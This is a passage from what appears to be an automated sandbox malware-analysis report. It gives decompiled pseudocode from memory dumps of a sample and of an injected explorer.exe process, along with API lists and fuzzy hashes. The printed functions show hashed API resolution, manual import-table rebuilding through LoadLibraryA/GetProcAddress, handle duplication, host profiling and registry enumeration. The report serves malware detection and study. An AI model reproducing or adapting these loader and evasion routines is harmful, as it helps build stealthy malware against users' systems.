				_t48 =  *0x361e6dc; // 0x35c
				 *0x361e6d0 = 0;
				E0360A4C1(_t48);
				E03608600( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

0x03601c68
0x03601c75
0x03601c77
0x03601c7e
0x03601ce4
0x03601c8b
0x03601c90
0x03601c96
0x03601c9b
0x03601ca1
0x03601ca3
0x03601ca7
0x03601d15
0x03601d17
0x03601d99
0x03601d9f
0x03601d9f
0x03601ca9
0x03601cb1
0x03601cb1
0x03601cbd
0x03601cc3
0x03601cc5
0x00000000
0x00000000
0x03601cc7
0x03601cd1
0x03601cd7
0x03601cdd
0x03601cdf
0x00000000
0x03601cdf
0x03601cab
0x03601caf
0x00000000
0x00000000
0x00000000
0x03601caf
0x03601cee
0x03601cef
0x03601cf0
0x03601cf1
0x03601cf2
0x03601cf7
0x03601d01
0x03601d06
0x03601d0e
0x03601d29
0x03601d2c
0x03601d36
0x03601d41
0x03601d54
0x03601d56
0x03601d58
0x03601d5a
0x03601d5b
0x03601d63
0x03601d64
0x03601d6a
0x03601d10
0x03601d10
0x03601d10
0x03601d6b
0x03601d76
0x03601d79
0x03601d7f
0x03601d85
0x03601d90
0x03601d97
0x00000000

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a26aa97f49520d4441224e81201f46038d44ad10ff4861d13c02136b149b062e
Instruction ID: 873af384aa20974af6a5a820a11506bf4177476567427300a4f007f4affe769f
Opcode Fuzzy Hash: a26aa97f49520d4441224e81201f46038d44ad10ff4861d13c02136b149b062e
Instruction Fuzzy Hash: BB31A43A614304AFD308FF68EC96C2B77A9FB45350B58092FF951D71D9DB21DC108696

Uniqueness

Uniqueness Score: -1.00%

Function 03601B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E03601B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x361e6f4; // 0x3ac
				_t12 = E0360A4A5(_t38, 0);
				while(_t12 < 0) {
					E036097F2( &_v28);
					_t40 =  *0x361e700; // 0x0
					_t14 =  *0x361e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x361e684; // 0x530f6c8
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x361e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x361e684; // 0x530f6c8
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x361e6f4; // 0x3ac
								__eflags = 0;
								_t12 = E0360A4A5(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E036097F2(0x361e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x361e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x361e6e8; // 0x530fc78
				_v28 = _t24;
				_t61 = E03601A1B( &_v28, E0360131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x361e760);
					_t48 = 0x27;
					E03609EEC(_t48);
				}
				if(_v24 != 0) {
					E03606876( &_v24);
				}
				_t26 =  *0x361e684; // 0x530f6c8
				 *((intOrPtr*)(_t26 + 0x30))( *0x361e6ec);
				_t28 =  *0x361e758; // 0x0
				 *0x361e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x361e6f4; // 0x3ac
				 *0x361e758 =  !=  ? 1 : _t28;
				E0360A4C1(_t46);
				_t15 = _t61;
				goto L12;
			}

0x03601b2d
0x03601b33
0x03601b41
0x03601baf
0x03601b4e
0x03601b53
0x03601b59
0x03601b5e
0x03601b64
0x03601b66
0x03601b6a
0x03601c64
0x03601c64
0x03601b70
0x03601b70
0x03601b7c
0x03601b7c
0x03601b88
0x03601b8e
0x03601b90
0x00000000
0x03601b92
0x03601b92
0x03601b9c
0x03601ba2
0x03601ba8
0x03601baa
0x00000000
0x03601baa
0x03601b72
0x03601b72
0x03601b76
0x00000000
0x00000000
0x00000000
0x00000000
0x03601b76
0x03601b70
0x03601c5d
0x03601c63
0x03601c63
0x03601bb8
0x03601bcc
0x03601bcf
0x03601bd9
0x03601be5
0x03601bef
0x03601bf0
0x03601bf1
0x03601bf2
0x03601bf7
0x03601c00
0x03601c04
0x03601c06
0x03601c07
0x03601c0f
0x03601c10
0x03601c16
0x03601c1b
0x03601c21
0x03601c21
0x03601c26
0x03601c31
0x03601c34
0x03601c3c
0x03601c48
0x03601c4b
0x03601c51
0x03601c56
0x03601c5b
0x00000000

APIs

GetCurrentProcess.KERNEL32(0361E6EC,00000000,00000000,00000002), ref: 03601BCC
GetCurrentThread.KERNEL32 ref: 03601BCF
GetCurrentProcess.KERNEL32(00000000), ref: 03601BD6
DuplicateHandle.KERNEL32(00000000), ref: 03601BD9

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: cf727b062261d718c954dc6d0ea3d8263b47cfe1c49f8128d718b15b859b394c
Instruction ID: 4924f5d2a83c4570645c6849a850e077ef041d7b50a8b26afa680d53ff9c7144
Opcode Fuzzy Hash: cf727b062261d718c954dc6d0ea3d8263b47cfe1c49f8128d718b15b859b394c
Instruction Fuzzy Hash: 8D31B03A6043019FE30CFF64E89A92B77A9EB45350B48182EF901872DDDB32DC14CB92

Uniqueness

Uniqueness Score: -1.00%

Function 03601A1B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108
stringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E03601A1B(intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				CHAR* _v20;
				char _v36;
				signed short _t22;
				CHAR* _t23;
				CHAR* _t24;
				CHAR* _t32;
				intOrPtr _t37;
				CHAR* _t38;
				CHAR* _t39;
				intOrPtr _t40;
				intOrPtr _t54;
				char* _t57;
				signed int _t60;
				signed int _t61;
				signed int _t64;
				CHAR* _t66;
				void* _t74;

				_t74 = __fp0;
				_t40 = __ecx;
				_t37 = __edx;
				_v12 = __ecx;
				_t57 =  *0x361e6f0; // 0x52e4f30
				_push(_t60);
				_t61 = _t60 | 0xffffffff;
				_v16 = __edx;
				_t66 = _t61;
				if( *_t57 != 0) {
					L6:
					_t22 =  *0x361e6fc; // 0x0
					_t72 = _t22;
					if(_t22 == 0) {
						goto L9;
					} else {
						_t24 = E0360160D(_t37, _t57, _t72, _t22 & 0x0000ffff, _t40);
						_t66 = _t24;
						if(_t66 < 0) {
							goto L9;
						} else {
						}
					}
				} else {
					_push(0x2d);
					_t39 = E03609E8B();
					_v20 = _t39;
					_t32 = E03609E4C(0x2e);
					_v8 = _t32;
					if(_t39 != 0 && _t32 != _t61) {
						_t54 =  *0x361e6f0; // 0x52e4f30
						E036096B0(_t54, _t39, 0x100);
						 *0x361e6fc = _v8;
					}
					E03608600( &_v20, _t61);
					_t57 =  *0x361e6f0; // 0x52e4f30
					if( *_t57 == 0) {
						L9:
						_t38 = 0;
						_v8 = 0;
						_t23 = E03601778( &_v8, _t74);
						_v20 = _t23;
						__eflags = _t23;
						if(_t23 != 0) {
							__eflags = _v8;
							if(_v8 > 0) {
								_t13 =  &(_t23[4]); // 0x4
								_t64 = _t13;
								while(1) {
									__eflags =  *_t64;
									if(__eflags != 0) {
										__imp__#12(0x10);
										lstrcpynA( &_v36, _t23,  *_t64);
										_t23 = E0360160D(_v16,  &_v36, __eflags,  *(_t64 + 4) & 0x0000ffff, _v12);
										_t66 = _t23;
									}
									__eflags = _t66;
									if(_t66 >= 0) {
										break;
									}
									_t38 = _t38 + 1;
									_t64 = _t64 + 0x20;
									__eflags = _t38 - _v8;
									if(_t38 < _v8) {
										continue;
									}
									break;
								}
								_t61 = _t64 | 0xffffffff;
								__eflags = _t61;
							}
							E03608600( &_v20, _v8);
						}
						__eflags = _t66;
						_t62 =  >=  ? _t66 : _t61;
						_t24 =  >=  ? _t66 : _t61;
					} else {
						_t37 = _v16;
						_t40 = _v12;
						goto L6;
					}
				}
				return _t24;
			}

0x03601a1b
0x03601a1b
0x03601a22
0x03601a24
0x03601a27
0x03601a2e
0x03601a2f
0x03601a32
0x03601a38
0x03601a3a
0x03601a95
0x03601a95
0x03601a9b
0x03601a9e
0x00000000
0x03601aa0
0x03601aa7
0x03601aac
0x03601ab2
0x00000000
0x00000000
0x03601ab4
0x03601ab2
0x03601a3c
0x03601a3c
0x03601a44
0x03601a48
0x03601a4b
0x03601a50
0x03601a56
0x03601a5c
0x03601a69
0x03601a72
0x03601a72
0x03601a7d
0x03601a82
0x03601a8d
0x03601ab6
0x03601ab6
0x03601abb
0x03601abe
0x03601ac3
0x03601ac6
0x03601ac8
0x03601aca
0x03601acd
0x03601acf
0x03601acf
0x03601ad2
0x03601ad2
0x03601ad5
0x03601adb
0x03601ae6
0x03601afa
0x03601b01
0x03601b01
0x03601b03
0x03601b05
0x00000000
0x00000000
0x03601b07
0x03601b08
0x03601b0b
0x03601b0e
0x00000000
0x00000000
0x00000000
0x03601b0e
0x03601b10
0x03601b10
0x03601b10
0x03601b1a
0x03601b20
0x03601b21
0x03601b23
0x03601b26
0x03601a8f
0x03601a8f
0x03601a92
0x00000000
0x03601a92
0x03601a8d
0x03601b2c

APIs

inet_ntoa.WS2_32(00000004), ref: 03601ADB
lstrcpynA.KERNEL32(?,00000000), ref: 03601AE6

Part of subcall function 036096B0: memset.MSVCRT ref: 036096D9

Strings

@}s, xrefs: 03601ADB

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: inet_ntoalstrcpynmemset
String ID: @}s
API String ID: 129148211-1738643329
Opcode ID: c12d169a9ccb2748af3ccc0eae50abd05b8eff2bbeb4dfc568fe2d0365266abc
Instruction ID: 6fae37f642fb32a08a25d729f3896f86ac5300fd283a50044fdf6d56966bca23
Opcode Fuzzy Hash: c12d169a9ccb2748af3ccc0eae50abd05b8eff2bbeb4dfc568fe2d0365266abc
Instruction Fuzzy Hash: 2431FB3AE0031AABDB19DFE4D881AAFB7B5EB45310F18025FD510A73C4EB749940CB94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 5620 Parent PID: 6352 explorer.exeCOMMON

Executed Functions

Function 00E5DFB8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 95
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E5DFB8(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E00E5D40B( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E00E5C384( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t18 =  &_v8; // 0xe5604a
					_t51 =  *_t18;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

0x00e5dfc1
0x00e5dfc3
0x00e5dfc6
0x00e5dfc9
0x00e5dfcf
0x00e5e02c
0x00000000
0x00e5e02c
0x00e5dfd1
0x00e5dfdc
0x00e5dfdf
0x00e5dfe4
0x00e5dfe9
0x00e5dfec
0x00e5dfee
0x00e5dff1
0x00e5dff4
0x00e5dff9
0x00000000
0x00000000
0x00000000
0x00000000
0x00e5dffb
0x00e5dffb
0x00e5e00d
0x00e5e01a
0x00e5e01a
0x00e5e01e
0x00000000
0x00000000
0x00e5e020
0x00e5e023
0x00e5e024
0x00e5e02a
0x00000000
0x00000000
0x00000000
0x00e5e02a
0x00e5e041
0x00e5e046
0x00e5e04a
0x00000000
0x00e5e056
0x00e5e056
0x00e5e058
0x00e5e058
0x00e5e05e
0x00000000
0x00000000
0x00e5e064
0x00e5e068
0x00e5e06c
0x00000000
0x00000000
0x00000000
0x00e5e06c
0x00e5e072
0x00e5e07a
0x00e5e07f
0x00e5e082
0x00e5e082
0x00e5e084
0x00e5e088
0x00e5e090
0x00000000
0x00000000
0x00e5e094
0x00e5e09c
0x00000000
0x00000000
0x00000000
0x00e5e09c

APIs

LoadLibraryA.KERNELBASE(.dll,J`,0000011C,00000000), ref: 00E5E088
GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 00E5E094

Strings

J`, xrefs: 00E5E01A
J`, xrefs: 00E5DFC0
.dll, xrefs: 00E5E084, 00E5E087

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: AddressLibraryLoadProc
String ID: .dll$J`$J`
API String ID: 2574300362-3045228671
Opcode ID: 82590b97f2fd15dba4018f9c0659b2e42b5f1b604fc5b382d9640a7c7b10ffe5
Instruction ID: 47be2b8d59d00d8daa90158b28c7766eb7386172c6ee341c95e0d23724519f48
Opcode Fuzzy Hash: 82590b97f2fd15dba4018f9c0659b2e42b5f1b604fc5b382d9640a7c7b10ffe5
Instruction Fuzzy Hash: AE319431A001599BCB28CF6DD8807AEBBE5AF44306F285869DC45F7391D7B0EE49C790

Uniqueness

Uniqueness Score: -1.00%

Function 00E5CF8F, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00E5CF8F(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0xe6e688; // 0xe80000
				GetCurrentProcess();
				_t11 = E00E5B9EB(); // executed
				_t1 = _t29 + 0x1644; // 0xe81644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E00E58FA4(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xe80228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E00E58FA4(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E00E5E3C1(_t3);
				_t7 = _t29 + 0x220; // 0xe80220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E00E5E3FC(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

0x00e5cf92
0x00e5cf94
0x00e5cf9b
0x00e5cfa3
0x00e5cfad
0x00e5cfad
0x00e5cfb3
0x00e5cfbc
0x00e5cfc2
0x00e5cfc4
0x00e5cfc8
0x00e5cfc8
0x00e5cfcd
0x00e5cfd3
0x00e5cfe3
0x00e5cfed
0x00e5cff5
0x00e5cff8
0x00e5d004
0x00e5d00a
0x00e5d00f
0x00e5d015
0x00e5d01b
0x00e5d021
0x00e5d029

APIs

GetCurrentProcess.KERNEL32(?,?,00E80000,?,00E5353A), ref: 00E5CF9B
GetModuleFileNameW.KERNEL32(00000000,00E81644,00000105,?,?,00E80000,?,00E5353A), ref: 00E5CFBC
memset.MSVCRT ref: 00E5CFED
GetVersionExA.KERNEL32(00E80000,00E80000,?,00E5353A), ref: 00E5CFF8
GetCurrentProcessId.KERNEL32(?,00E5353A), ref: 00E5CFFE

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: 6f9e4a160f5193cef5f8becbca3ee34e6ac2211230e728561dc3fb0e40881a05
Instruction ID: 47846cdc39875daa40a14a87640607f2d79a32848243e08e4835e2558ff94615
Opcode Fuzzy Hash: 6f9e4a160f5193cef5f8becbca3ee34e6ac2211230e728561dc3fb0e40881a05
Instruction Fuzzy Hash: 38019E70A017009FE720AF71AD0ABDB7BE5EF94351F000C2DF956A3250EFB46509CA50

Uniqueness

Uniqueness Score: -1.00%

Function 00E624A6, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00E624A6(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E00E5E0A4(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x00e624ac
0x00e624b4
0x00e624c9
0x00e624db
0x00e624e7
0x00e624ed
0x00e624f2
0x00e624fe
0x00e62669
0x00000000
0x00e62669
0x00e62504
0x00e6250d
0x00e6251b
0x00e6251e
0x00e6252d
0x00e6252d
0x00e62534
0x00e62542
0x00e62545
0x00e6255c
0x00e62562
0x00e62569
0x00e62579
0x00e62591
0x00e6257b
0x00e62583
0x00e62583
0x00e62594
0x00e62598
0x00e625a4
0x00e625a8
0x00e625ac
0x00e625b0
0x00e625bc
0x00e625e7
0x00e625ef
0x00e62601
0x00e6260d
0x00e625be
0x00e625c3
0x00e625ce
0x00e625da
0x00e625da
0x00e62616
0x00e6261c
0x00e62626
0x00e62642
0x00e62628
0x00e62637
0x00e62637
0x00e62626
0x00e6264a
0x00e62653
0x00e62653
0x00e62661
0x00000000
0x00e62661
0x00e6256d
0x00000000
0x00e6256d
0x00000000
0x00e62545
0x00000000

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00E624C3
LoadLibraryA.KERNELBASE(00000000), ref: 00E6255C

Strings

kernel32.dll, xrefs: 00E624BE
GetProcAddress, xrefs: 00E624CC

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: 9abdf5bb9ef2270c871a12cb04801ad69a76d237452fc4ee3758340f650b57af
Instruction ID: 7d618a1dcfadd11b6e7c6262d145a8f39e3499470f1018a4630161e030597057
Opcode Fuzzy Hash: 9abdf5bb9ef2270c871a12cb04801ad69a76d237452fc4ee3758340f650b57af
Instruction Fuzzy Hash: DB61BD75D40608EFDB00CF98D585BADBBB1BF08369F208599E911BB2A1C374AA80DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00E5619A, Relevance: 6.1, APIs: 4, Instructions: 145
registryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00E5619A(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				void* _t53;
				intOrPtr _t63;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t53 = E00E585EA(0x3fff); // executed
				_t98 = _t53;
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E00E585EA(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						_t63 =  *0xe6e68c; // 0x510f890
						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
					}
					E00E58600( &_v32, 0x3fff); // executed
					E00E58600( &_v36, 0x800); // executed
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0xe6e68c; // 0x510f890
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0xe6e68c; // 0x510f890
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0xe6e690; // 0x510f968
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0xe6e68c; // 0x510f890
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E00E5C39D(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E00E5B197(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0xe6e68c; // 0x510f890
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}

0x00e5619a
0x00e5619a
0x00e561a6
0x00e561b5
0x00e561b8
0x00e561c2
0x00e561ca
0x00e561cd
0x00e561d0
0x00e561d5
0x00e561d7
0x00e561da
0x00e561df
0x00e5634b
0x00e5634f
0x00e5634f
0x00e561ef
0x00e561f1
0x00e561f7
0x00000000
0x00000000
0x00e5621a
0x00e56319
0x00e5631d
0x00e5631f
0x00e56327
0x00e56327
0x00e56333
0x00e56341
0x00000000
0x00e56346
0x00e56223
0x00e56227
0x00e5622b
0x00e5622f
0x00e56233
0x00e56234
0x00e56235
0x00e56236
0x00e56237
0x00e5623b
0x00e56242
0x00e56243
0x00e56248
0x00e56253
0x00e56268
0x00e5626a
0x00000000
0x00000000
0x00e56270
0x00e56273
0x00e5627b
0x00e56288
0x00e5628d
0x00e56290
0x00e56299
0x00e562a0
0x00e562b0
0x00e562ba
0x00e562c0
0x00e562c2
0x00e562c7
0x00e562d0
0x00e562d2
0x00e562d4
0x00e562d6
0x00e562e0
0x00e562e6
0x00e562ea
0x00e562ee
0x00e562f3
0x00e562f9
0x00e562fb
0x00e562fd
0x00e562fd
0x00e56304
0x00e56304
0x00e562ea
0x00e56309
0x00e56309
0x00e5630c
0x00e5630d
0x00e56310
0x00e56310
0x00000000
0x00e56273
0x00e56255
0x00e5625d
0x00000000

APIs

memset.MSVCRT ref: 00E561B8

Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8

RegOpenKeyExW.KERNELBASE(?,?,00000000,0002001F,?,?,?,00000001), ref: 00E56212
memset.MSVCRT ref: 00E5627B
memset.MSVCRT ref: 00E56288

Memory Dump Source

Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true

Similarity

API ID: memset$AllocateHeapOpen
String ID:
API String ID: 2508404634-0
Opcode ID: b405a83929654ad06fa638bda250d8dacecd4cd4be3d0cd338c35c00b76c140f
Instruction ID: 047178b199e5d8f1a4287fe637aec4ddfa843b078975e474553f3789095c2824
Opcode Fuzzy Hash: b405a83929654ad06fa638bda250d8dacecd4cd4be3d0cd338c35c00b76c140f
Instruction Fuzzy Hash: 48515971A00209AFDB11DF94DC86EEF7BBCAF04345F105569FA05F7191EB709A088BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E59B29, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 89%

